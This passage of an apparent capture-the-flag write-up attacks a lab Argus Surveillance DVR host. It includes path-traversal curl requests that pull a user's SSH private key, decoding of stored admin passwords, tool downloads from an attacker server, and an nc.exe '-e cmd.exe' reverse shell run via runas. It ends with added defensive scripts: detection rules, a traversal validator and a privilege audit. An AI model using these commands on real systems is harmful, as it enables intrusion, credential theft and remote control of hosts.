|_http-generator: Actual Drawing 6.0 (http://www.pysoft.com) [PYSOFTWARE]
| fingerprint-strings:
|   GetRequest, HTTPOptions:
|     HTTP/1.1 200 OK
|     Connection: Keep-Alive
|     Keep-Alive: timeout=15, max=4
|     Content-Type: text/html
|     Content-Length: 985
|     <HTML>
|     <HEAD>
|     <TITLE>
|     Argus Surveillance DVR
|     </TITLE>
|     <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
|     <meta name="GENERATOR" content="Actual Drawing 6.0 (http://www.pysoft.com) [PYSOFTWARE]">
|     <frameset frameborder="no" border="0" rows="75,*,88">
|     <frame name="Top" frameborder="0" scrolling="auto" noresize src="CamerasTopFrame.html" marginwidth="0" marginheight="0">
|     <frame name="ActiveXFrame" frameborder="0" scrolling="auto" noresize src="ActiveXIFrame.html" marginwidth="0" marginheight="0">
|     <frame name="CamerasTable" frameborder="0" scrolling="auto" noresize src="CamerasBottomFrame.html" marginwidth="0" marginheight="0">
|     <noframes>
|     <p>This page uses frames, but your browser doesn't support them.</p>
|_    </noframes>
12745/tcp filtered unknown
17951/tcp filtered unknown
22015/tcp filtered unknown
35995/tcp filtered unknown
37289/tcp filtered unknown
37889/tcp filtered unknown
42948/tcp filtered unknown
44953/tcp filtered unknown
49664/tcp open     msrpc          Microsoft Windows RPC
49665/tcp open     msrpc          Microsoft Windows RPC
49666/tcp open     msrpc          Microsoft Windows RPC
49667/tcp open     msrpc          Microsoft Windows RPC
49668/tcp open     msrpc          Microsoft Windows RPC
49669/tcp open     msrpc          Microsoft Windows RPC
52732/tcp filtered unknown
63296/tcp filtered unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.95%I=7%D=3/23%Time=67DFE268%P=aarch64-unknown-linux-gn
...
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2025-03-23T10:31:34
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
|_clock-skew: -1s
```

> SSH, RPC, Http-proxy; browse to http://192.168.124.179:8080/\
![image](https://hackmd.io/_uploads/SJVeVwTnJe.png)

Browse to http://192.168.124.179:8080/CamConfDevices.html?Cameras=new\
![image](https://hackmd.io/_uploads/HygGEP6hkx.png)

Browse to http://192.168.124.179:8080/Users.html
![image](https://hackmd.io/_uploads/rymYCwp3Jx.png)

> Reveals usernames

#### 1.2 Http-proxy scan

```
┌──(chw㉿CHW)-[~/Tools/spose_http-proxy-scanner]
└─$ python3 spose.py --proxy http://192.168.124.179:8080 --target 192.168.124.179
Scanning default common ports
Using proxy address http://192.168.124.179:8080
```

#### 1.3 Enum4linux

```
┌──(chw㉿CHW)-[~]
└─$ enum4linux -a 192.168.124.179
...
┌──(chw㉿CHW)-[~]
└─$ smbclient -N -L \\\\192.168.124.179\\
session setup failed: NT_STATUS_ACCESS_DENIED
```

> Nothing usable

#### 1.4 Searchsploit

```
┌──(chw㉿CHW)-[~]
└─$ searchsploit Argus Surveillance DVR
------------------------------------------------------------ ---------------------------------
 Exploit Title                                              |  Path
------------------------------------------------------------ ---------------------------------
Argus Surveillance DVR 4.0 - Unquoted Service Path          | windows/local/50261.txt
Argus Surveillance DVR 4.0 - Weak Password Encryption       | windows/local/50130.py
Argus Surveillance DVR 4.0.0.0 - Directory Traversal        | windows_x86/webapps/45296.txt
Argus Surveillance DVR 4.0.0.0 - Privilege Escalation       | windows_x86/local/45312.c
------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

┌──(chw㉿CHW)-[~]
└─$ searchsploit -x 50261

┌──(chw㉿CHW)-[~]
└─$ searchsploit -x 50130

┌──(chw㉿CHW)-[~]
└─$ searchsploit -x 45296
```

> Directory Traversal can be tried

### 2. Exploit - Path Traversal

Read `/windows/system.ini`

```
┌──(chw㉿CHW)-[~]
└─$ curl "http://192.168.124.179:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
; for 16-bit app support
[386Enh]
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON

[drivers]
wave=mmdrv.dll
timer=timer.drv

[mci]
```

Read `/Windows/win.ini`

```
┌──(chw㉿CHW)-[~]
└─$ curl "http://192.168.124.179:8080/WEBACCOUNT.CGI?RESULTPAGE=../../../../../../../../Windows/win.ini"
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
```

🧠 The usernames are already leaked:\
so grab the flag directly via path traversal XDD

```
┌──(chw㉿CHW)-[~]
└─$ curl "http://192.168.124.179:8080/WEBACCOUNT.CGI?RESULTPAGE=../../../../../../../../Users/Viewer/Desktop/local.txt"
{Flag}
```

### ✅ Get User Flag

> The user flag is in `C:\Users\apache\Desktop`

🥚 Privilege escalation is still needed; the user's `id_rsa` can be read and used to log in via SSH

### 3. SSH Login

```
┌──(chw㉿CHW)-[~]
└─$ curl "http://192.168.124.179:8080/WEBACCOUNT.CGI?RESULTPAGE=../../../../../../../../Users/Viewer/.ssh/id_rsa"
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAuuXhjQJhDjXBJkiIftPZng7N999zteWzSgthQ5fs9kOhbFzLQJ5J
Ybut0BIbPaUdOhNlQcuhAUZjaaMxnWLbDJgTETK8h162J81p9q6vR2zKpHu9Dhi1ksVyAP
iJ/njNKI0tjtpeO3rjGMkKgNKwvv3y2EcCEt1d+LxsO3Wyb5ezuPT349v+MVs7VW04+mGx
pgheMgbX6HwqGSo9z38QetR6Ryxs+LVX49Bjhskz19gSF4/iTCbqoRo0djcH54fyPOm3OS
2LjjOKrgYM2aKwEN7asK3RMGDaqn1OlS4tpvCFvNshOzVq6l7pHQzc4lkf+bAi4K1YQXmo
7xqSQPAs4/dx6e7bD2FC0d/V9cUw8onGZtD8UXeZWQ/hqiCphsRd9S5zumaiaPrO4CgoSZ
GEQA4P7rdkpgVfERW0TP5fWPMZAyIEaLtOXAXmE5zXhTA9SvD6Zx2cMBfWmmsSO8F7pwAp
zJo1ghz/gjsp1Ao9yLBRmLZx4k7AFg66gxavUPrLAAAFkMOav4nDmr+JAAAAB3NzaC1yc2
EAAAGBALrl4Y0CYQ41wSZIiH7T2Z4Ozfffc7Xls0oLYUOX7PZDoWxcy0CeSWG7rdASGz2l
HToTZUHLoQFGY2mjMZ1i2wyYExEyvIdetifNafaur0dsyqR7vQ4YtZLFcgD4if54zSiNLY
7aXjt64xjJCoDSsL798thHAhLdXfi8bDt1sm+Xs7j09+Pb/jFbO1VtOPphsaYIXjIG1+h8
...
-----END OPENSSH PRIVATE KEY-----
```

Save it locally

```
┌──(chw㉿CHW)-[~]
└─$ curl "http://192.168.124.179:8080/WEBACCOUNT.CGI?RESULTPAGE=../../../../../../../../Users/Viewer/.ssh/id_rsa" > DVR4_rsa
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  2612  100  2612    0     0   9860      0 --:--:-- --:--:-- --:--:--  9893
```

SSH login

```
┌──(chw㉿CHW)-[~]
└─$ chmod 600 DVR4_rsa

┌──(chw㉿CHW)-[~]
└─$ ssh viewer@192.168.124.179 -i DVR4_rsa
Microsoft Windows [Version 10.0.19044.1645]
(c) Microsoft Corporation. All rights reserved.

C:\Users\viewer>whoami
dvr4\viewer

C:\Users\viewer>hostname
DVR4

C:\Users\viewer>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Users\viewer>
```

## Privilege Escalation

### 4. PowerUp.ps1

```
┌──(chw㉿CHW)-[~/Desktop/upload_tools]
└─$ ls
PowerUp.ps1
...
┌──(chw㉿CHW)-[~/Desktop/upload_tools]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
```

```
PS C:\Users\viewer> iwr -Uri http://192.168.45.165/PowerUp.ps1 -UseBasicParsing -Outfile PowerUp.ps1

PS C:\Users\viewer> powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Users\viewer> . .\PowerUp.ps1

PS C:\Users\viewer> Get-ModifiableServiceFile
Get-ModifiableServiceFile : The term 'Get-ModifiableServiceFile' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ Get-ModifiableServiceFile
+ ~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (Get-ModifiableServiceFile:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
```

> viewer cannot access the Win32_Service WMI class

### 5. Searchsploit

🧠 `1.4 Searchsploit` listed `Argus Surveillance DVR 4.0 - Weak Password Encryption`

```
┌──(chw㉿CHW)-[~/Desktop/upload_tools]
└─$ searchsploit -x 50130
# Exploit Title: Argus Surveillance DVR 4.0 - Weak Password Encryption
# Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker
# Date: 12.07.2021
# Version: Argus Surveillance DVR 4.0
# Tested on: Windows 7 x86 (Build 7601) & Windows 10
# Reference: https://deathflash1411.github.io/blog/dvr4-hash-crack
# Note: Argus Surveillance DVR 4.0 configuration is present in
# C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini
# I'm too lazy to add special characters :P
...
```

> Look at `C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini`\

>[!Note]
>The file can also be located directly with a search:\
>`Get-ChildItem -Path C:\ -Recurse -Force -ErrorAction SilentlyContinue -Filter "DVRParams.ini" `

Confirm the path exists

```
PS C:\> dir -Force

    Directory: C:\

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d--hs-         12/3/2021  12:29 AM                $Recycle.Bin
d--h--         4/15/2022   5:02 AM                $WinREAgent
d--hs-         4/15/2022   7:08 AM                Config.Msi
d--hsl         6/18/2021  10:28 AM                Documents and Settings
d-----         12/7/2019   1:14 AM                PerfLogs
d-r---         4/15/2022   7:07 AM                Program Files
d-r---         6/18/2021   5:55 AM                Program Files (x86)
d--h--         12/3/2021  12:24 AM                ProgramData
d--hs-         3/11/2022  10:03 PM                Recovery
d--hs-         6/18/2021   3:31 AM                System Volume Information
d-r---         12/3/2021  12:21 AM                Users
d-----         4/15/2022   7:07 AM                Windows
-a-hs-          8/1/2024  10:33 PM           8192 DumpStack.log.tmp
-a----         3/23/2025   6:06 AM           2690 output.txt
-a-hs-          8/1/2024  10:33 PM      671088640 pagefile.sys
-a-hs-          8/1/2024  10:33 PM      268435456 swapfile.sys

PS C:\> type "C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini"
[Main]
ServerName=
ServerLocation=
ServerDescription=
...
[Users]
LocalUsersCount=2
UserID0=434499
LoginName0=Administrator
...
Password0=ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8
...
Password1=5E534D7B6069F641E03BD9BD956BC875EB603CD9D8E1BD8FAAFE
...
```

### 6. Use the exploit

```
┌──(chw㉿CHW)-[~]
└─$ searchsploit -m 50130

┌──(chw㉿CHW)-[~]
└─$ vi 50130.py
...
# Change this :)
pass_hash = "ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A85E534D7B6069F641E03BD9BD956BC875EB603CD9D8E1BD8FAAFE"

if (len(pass_hash)%4) != 0:
    print("[!] Error, check your password hash")
    exit()

split = []
n = 4
...
┌──(chw㉿CHW)-[~]
└─$ python3 50130.py
#########################################
#     _____ Surveillance DVR 4.0        #
#    /  _  \_______  ____  __ __  ______ #
#   /  /_\  \_  __ \/ ___\|  |  \/  ___/ #
#  /    |    \  | \/ /_/  >  |  /\___ \  #
#  \____|__  /__|  \___  /|____//____  > #
#          \/     /_____/            \/  #
#        Weak Password Encryption       #
############ @deathflash1411 ############
[+] ECB4:1
[+] 53D1:4
[+] 6069:W
[+] F641:a
[+] E03B:t
[+] D9BD:c
[+] 956B:h
[+] FE36:D
[+] BD8F:0
[+] 3CD9:g
[-] D9A8:Unknown
[+] 5E53:I
[+] 4D7B:m
[+] 6069:W
[+] F641:a
[+] E03B:t
[+] D9BD:c
[+] 956B:h
[+] C875:i
[+] EB60:n
[+] 3CD9:g
[+] D8E1:Y
[+] BD8F:0
[+] AAFE:u
```

> `[-] D9A8:Unknown` is a special character\
> A more detailed exploit was found: [CVE-2022-25012](https://github.com/s3l33/CVE-2022-25012/blob/main/CVE-2022-25012.py)
> D9A8:`$`
>
>`14WatchD0g$ImWatchingY0u`

We now have the Admin account password, but without an id_rsa we cannot log in via SSH

### 7. Runas

Use Runas together with nc.exe to open a reverse shell

#### 7.1 Check the system environment

```
PS C:\Users\viewer\Desktop> systeminfo
ERROR: Access denied

PS C:\Users\viewer\Desktop> [Environment]::Is64BitOperatingSystem
True
```

> systeminfo is not permitted, so use `[Environment]::Is64BitOperatingSystem` >> x64

#### 7.2 Download nc.exe

(Kali)

```
┌──(chw㉿CHW)-[~/Desktop/upload_tools]
└─$ ls
nc_x64.exe
...

┌──(chw㉿CHW)-[~/Desktop/upload_tools]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
```

(Windows)

```
PS C:\Users\viewer\Desktop> iwr -uri http://192.168.45.178/nc_x64.exe -Outfile nc.exe

PS C:\Users\viewer\Desktop> ls

    Directory: C:\Users\viewer\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         3/23/2025   6:06 AM             34 local.txt
-a----         3/23/2025   6:57 AM         207523 nc.exe
```

#### 7.3 Run Runas as Admin

Open a listener port on Kali

```
┌──(chw㉿CHW)-[~]
└─$ nc -nvlp 8888
listening on [any] 8888 ...
```

Run Runas as Admin

```
PS C:\Users\viewer\Desktop> runas /user:administrator "C:\users\viewer\desktop\nc.exe -e cmd.exe 192.168.45.178 8888"
Enter the password for administrator:
Attempting to start C:\users\viewer\desktop\nc.exe -e cmd.exe 192.168.45.178 8888 as user "DVR4\administrator" ...
```

#### 7.4 Get a Shell

```
┌──(chw㉿CHW)-[~]
└─$ nc -nvlp 8888
listening on [any] 8888 ...
connect to [192.168.45.178] from (UNKNOWN) [192.168.124.179] 50691
Microsoft Windows [Version 10.0.19044.1645]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
dvr4\administrator
```

### ✅ Get Root FLAG

> The root flag is in `C:\Users\Administrator\Desktop`
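The Livda escalation hinged on one line of `whoami /priv`: a service account holding SeImpersonatePrivilege. The audit script below is an added example (not part of the writeup or of any tool it uses) that parses that output and flags the privileges a hardening review would want to see on a web-server service account. The sample text is the writeup's own `whoami /priv` output embedded inline; the HIGH_RISK list is my selection of well-known token privileges, not something the page defines.

```python
"""Flag high-risk token privileges in `whoami /priv` output.

Added example for the Livda privilege-escalation section; not the writeup's
code. The sample below is the writeup's own `whoami /priv` output, embedded so
the script runs offline.
"""
import re

# Token privileges that are routinely abused for local escalation when held by
# a low-privileged service account (SeImpersonatePrivilege is the writeup's case).
# Selection is mine, not from the page.
HIGH_RISK = {
    "SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege", "SeDebugPrivilege",
    "SeBackupPrivilege", "SeRestorePrivilege", "SeTakeOwnershipPrivilege",
    "SeLoadDriverPrivilege", "SeTcbPrivilege", "SeCreateTokenPrivilege",
    "SeManageVolumePrivilege",
}

SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# One data row: name, free-text description, then Enabled/Disabled at the end.
_ROW = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")


def parse_privileges(text):
    """Return {privilege_name: state} for every Se*Privilege row in the output."""
    privs = {}
    for line in text.splitlines():
        m = _ROW.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs


def risky_privileges(text, include_disabled=True):
    """Sorted names of HIGH_RISK privileges present in the token.

    A Disabled privilege is still held by the token (the process can enable it
    with AdjustTokenPrivileges), so it is reported by default.
    """
    privs = parse_privileges(text)
    return sorted(
        name for name, state in privs.items()
        if name in HIGH_RISK and (include_disabled or state == "Enabled")
    )


if __name__ == "__main__":
    print("parsed  :", parse_privileges(SAMPLE_WHOAMI_PRIV))
    print("high-risk:", risky_privileges(SAMPLE_WHOAMI_PRIV))
```

On a real host, run it against `whoami /priv` captured from the account the web server runs as; if the result is non-empty, the fix is to run the service under an account that does not carry the privilege (a virtual service account or a dedicated low-privilege user) rather than to rely on the box having no Potato-style path.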
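Both machines leave the same three footprints in process-creation telemetry: a web server process spawning cmd.exe (the PHP reverse shell on Livda), certutil used as a downloader (`-urlcache -split -f http://...`), and nc.exe started with `-e cmd.exe`. The detector below is an added example, not from the writeup: it runs three rules over a handful of constructed events. The field names (Image, CommandLine, ParentImage) follow the Sysmon Event ID 1 layout, but the events themselves are invented to mirror the page's commands and are not real telemetry.

```python
"""Detect the post-exploitation patterns from the Livda and DVR4 sections in
process-creation events (added example; constructed events, not real logs)."""
import re

WEB_SERVER_IMAGES = {"httpd.exe", "w3wp.exe", "nginx.exe", "tomcat.exe", "php-cgi.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def basename(path):
    """Lower-case file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


RULES = [
    # Web server process launching an interactive shell (web shell / RCE).
    ("web_server_spawned_shell",
     lambda e: basename(e["ParentImage"]) in WEB_SERVER_IMAGES
               and basename(e["Image"]) in SHELLS),
    # certutil fetching a URL into the cache: a LOLBin download, not a cert op.
    ("certutil_download",
     lambda e: basename(e["Image"]) == "certutil.exe"
               and re.search(r"-urlcache\b", e["CommandLine"], re.I)
               and re.search(r"https?://", e["CommandLine"], re.I)),
    # netcat-style shell: "-e cmd.exe"/"-e powershell" followed by IP and port.
    ("netcat_reverse_shell",
     lambda e: re.search(r"\s-e\s+(cmd|powershell)(\.exe)?\b", e["CommandLine"], re.I)
               and re.search(r"\b\d{1,3}(\.\d{1,3}){3}\s+\d{2,5}\b", e["CommandLine"])),
]


def evaluate(events):
    """Return [(rule_name, event_index)] for every rule that matches an event."""
    hits = []
    for i, e in enumerate(events):
        for name, pred in RULES:
            if pred(e):
                hits.append((name, i))
    return hits


# Constructed sample events mirroring the writeup's commands (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe",
     "ParentImage": r"C:\wamp\bin\apache\Apache2.2.21\bin\httpd.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -urlcache -split -f http://192.168.45.165/SigmaPotato.exe SigmaPotato.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",   # benign certutil use
     "CommandLine": "certutil -dump",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\users\viewer\desktop\nc.exe",      # runas launches via Secondary Logon (svchost)
     "CommandLine": "nc.exe -e cmd.exe 192.168.45.178 8888",
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
    {"Image": r"C:\Windows\System32\whoami.exe",
     "CommandLine": "whoami /priv",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

if __name__ == "__main__":
    for name, idx in evaluate(SAMPLE_EVENTS):
        print(f"{name:26} -> {SAMPLE_EVENTS[idx]['CommandLine']}")
```

The certutil rule keys on `-urlcache` plus a URL rather than on the binary name, so ordinary certificate maintenance (`certutil -dump`, the third event) does not fire; the web-shell rule works on parent/child lineage, which survives the attacker renaming the shell or the dropped file.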
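The DVR4 `RESULTPAGE` parameter accepted both the percent-encoded form (`..%2F..%2F...Windows%2Fsystem.ini`) and the plain form (`../../../../Users/Viewer/.ssh/id_rsa`). The function below is an added example of the check the CGI should have applied, written by me and not taken from the vendor or the writeup: decode until the value is stable, normalise, and refuse anything that resolves outside the web root. `WEB_ROOT` and the sample parameter values are assumptions; the first two samples are the exact forms the writeup used.

```python
"""Reject path traversal in a user-supplied page parameter (added example for
the DVR4 path-traversal section; web root and sample values are assumed)."""
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/srv/argus/www"   # assumed web root, not the product's real path


def fully_decode(value, max_rounds=5):
    """Percent-decode until the string stops changing, so a double-encoded
    sequence such as %252e%252e cannot survive a single decode pass."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    return value


def resolve_page(param, web_root=WEB_ROOT):
    """Canonical absolute path for `param`, or None if it would escape `web_root`.

    Backslashes are treated as separators because the target is a Windows
    server; embedded NULs are rejected outright.
    """
    decoded = fully_decode(param).replace("\\", "/")
    if "\x00" in decoded:
        return None
    rel = decoded.lstrip("/")                      # absolute input -> relative to root
    root = posixpath.normpath(web_root)
    candidate = posixpath.normpath(posixpath.join(root, rel))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


def is_traversal(param):
    return resolve_page(param) is None


# Constructed request values; True means the check must block the request.
SAMPLES = {
    "..%2F..%2F..%2F..%2FWindows%2Fsystem.ini": True,          # writeup, encoded
    "../../../../../../../../Users/Viewer/.ssh/id_rsa": True,  # writeup, plain
    "..%252F..%252FWindows%252Fwin.ini": True,                  # double-encoded
    "..\\..\\Windows\\win.ini": True,                           # backslash variant
    "Cameras/Top.html": False,
    "sub/../index.html": False,                                 # stays inside root
    "images/../../secret.html": True,                           # climbs one above root
}


def check_samples(samples=SAMPLES):
    """Return the samples whose classification disagrees with the label."""
    return {p: is_traversal(p) for p, expected in samples.items() if is_traversal(p) != expected}


if __name__ == "__main__":
    for p in SAMPLES:
        print(f"{'BLOCK' if is_traversal(p) else 'allow':5} {p!r:55} -> {resolve_page(p)}")
```

In a real handler the comparison should be done on the `realpath` of the candidate, so that a symlink inside the web root cannot re-escape it after the string-level check passes.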
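The exploit output in section 6 shows why the Argus "password hash" is nothing of the kind: every plaintext character maps to a fixed 4-hex-digit chunk, independent of position and of the other characters, so `6069 F641 E03B D9BD 956B` ("Watch") appears in both stored values. The script below is an added example, not the exploit's code: it shows that weakness from the two `DVRParams.ini` values the writeup printed, using only the chunk-to-character pairs the writeup's decoder output lists (plus `D9A8` -> `$` from its note), and contrasts it with salted PBKDF2 storage, where the same substring produces unrelated digests. The iteration count is a placeholder chosen for speed, not a production recommendation.

```python
"""Show that the Argus DVR stored password is a per-character codebook, not a
hash (added example; values and partial codebook come from the writeup)."""
import hashlib
import os
from collections import Counter

PASSWORD0 = "ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8"
PASSWORD1 = "5E534D7B6069F641E03BD9BD956BC875EB603CD9D8E1BD8FAAFE"

# Partial codebook recovered on the page: 4 hex digits per plaintext character.
CODEBOOK = {
    "ECB4": "1", "53D1": "4", "6069": "W", "F641": "a", "E03B": "t",
    "D9BD": "c", "956B": "h", "FE36": "D", "BD8F": "0", "3CD9": "g",
    "D9A8": "$", "5E53": "I", "4D7B": "m", "C875": "i", "EB60": "n",
    "D8E1": "Y", "AAFE": "u",
}


def chunks(value, size=4):
    """Split the stored value into fixed-size code units."""
    if len(value) % size:
        raise ValueError("length is not a multiple of the chunk size")
    return [value[i:i + size].upper() for i in range(0, len(value), size)]


def shared_chunks(a, b):
    """Code units present in both stored values, in the order they occur in a.
    Two real password hashes share nothing beyond chance."""
    in_b = set(chunks(b))
    return [c for c in chunks(a) if c in in_b]


def repeated_chunks(value):
    """{chunk: count} for every code unit that occurs more than once."""
    return {c: n for c, n in Counter(chunks(value)).items() if n > 1}


def decode(value, codebook=CODEBOOK):
    """Substitute each code unit through the codebook; unknown units become '?'."""
    return "".join(codebook.get(c, "?") for c in chunks(value))


def proper_hash(password, salt=None, iterations=100_000):
    """Salted PBKDF2-HMAC-SHA256 for contrast (iteration count is a placeholder)."""
    salt = salt or os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)


if __name__ == "__main__":
    print("shared code units:", shared_chunks(PASSWORD0, PASSWORD1))
    print("decoded:", decode(PASSWORD0), "|", decode(PASSWORD1))
    _, h1 = proper_hash("14WatchD0g$")
    _, h2 = proper_hash("ImWatchingY0u")
    print("PBKDF2 digests share prefix bytes:", h1[:4] == h2[:4])
```

The observable that gives the scheme away needs no key at all: repeated code units inside one value and across two values are impossible for a salted hash and expected for a substitution table, which is exactly what let the published decoder recover characters one chunk at a time.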